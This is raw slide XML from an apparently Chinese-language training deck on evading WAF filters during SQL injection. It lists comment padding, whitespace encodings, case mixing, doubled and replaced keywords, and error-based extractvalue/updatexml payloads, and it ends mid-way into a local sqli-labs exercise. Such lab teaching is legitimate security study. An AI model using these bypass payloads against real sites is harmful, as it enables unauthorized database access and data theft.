              <a:t>union select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>之间的空格进行检测的情况）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>union/*crow%0%32#*/select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>我们在注释符中间填充内容</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>union/*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>aaaaaaaaaabbbbbbbbbcccccccccccdddddddddddeeeeeeeeeeee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>%%%%%%%%%*/select  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>构造较大数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>/*!union select*/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>内联注释        我们使用内联注释，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>特有</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>以上均采用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>select 1;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>进行测试成功</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3112773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790043" y="390033"/>
            <a:ext cx="10131425" cy="276038"/>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_09</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空白符绕过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>              </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>空白符：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>%09</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>；</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>%0A;  %0B;  %0D;  %20;  %0C;  %A0;  /*XXX*/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>）正则空白符：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> %09</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>；</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>%0A;  %0B;  %0D;  %20; </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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>               </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1766819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90033"/>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_10</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3893126"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>参考链接：太多太多，总之感谢各位大佬的文章</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>函数分割符号</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>将一个函数进行分割</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>()</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pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>concat%2520(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>/**/(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>concat%250c(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>concat%25a0(</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="283906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31607" y="250961"/>
            <a:ext cx="10131425" cy="33145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4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>浮点数法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>waf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>对于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>可以进行检测，但是对于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>id=1E0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>id=1.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>id=\N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>可能就无法检测</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4056993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pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>extractvalue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>(1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>(0x5c,md5(3)));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>updatexml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>(1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>(0x5d,md5(3)),1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>GeometryCollection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>((select*from(select*from(select@@version)f)x))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>polygon((select*from(select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>name_const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>(version(),1))x))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>linestring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>multipoint()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>multilinestring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>multipolygon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3075781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3970" y="416689"/>
            <a:ext cx="10131425" cy="181622"/>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6. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>特殊语法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>select {x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>schema_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>} from {x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>information_schema.schemata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>};</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>select {x 1};</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1155243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35259" y="416689"/>
            <a:ext cx="10131425" cy="159044"/>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7. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>大小写绕过</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>如果对关键字</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>and  or  union</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>等进行了过滤，可以考虑使用大小写混合的方法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>Or   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>aNd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>UniOn</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>但是很多时候有函数会部分大小写进行过滤，这个时候我们可以考虑使用双写的方法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>8. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>关键字重复</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>OORr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> or</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>9.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t> 关键字替换</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>如果还是无法绕过，可以考虑替换的方法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> &amp;&amp;    or  ||   like</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>可以替换 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>=    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>&lt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>等价于 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>!=  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>方法有很多，这里可能列举的不足。。。主要就是看谁思路更猥琐</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40646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2060575" y="416689"/>
            <a:ext cx="10131425" cy="23806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3. fuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>burpsuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>配合手工进行测试，后期测试成功后再用脚本进行处理。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="333178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2261097" y="346364"/>
            <a:ext cx="10131425" cy="373020"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>简单基础命令</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可参考链接： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.jianshu.com/p/2ad3edf3c61f</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>docker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>      # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>查看正在运行的容器</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>docker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> –a  # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>查看所有容器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>docker images #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>列出本地镜像</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>docker start CONTAINER # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>启动一个或多少已经被停止的容器</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>docker stop CONTAINER # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>停止一个运行中的容器</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>docker restart CONTAINER #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>重启容器</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>docker rm CONTAINER # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>删除容器</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>docker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>rmi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> IMAGE # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>删除镜像</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>restart docker #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>重启</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>docker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3666257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292511"/>
            <a:ext cx="10131425" cy="215489"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-25_01</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http://127.0.0.1/sqli/Less-25/?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>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/Less-25/?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>’ </a:t>
            </a:r>
            <a:r>
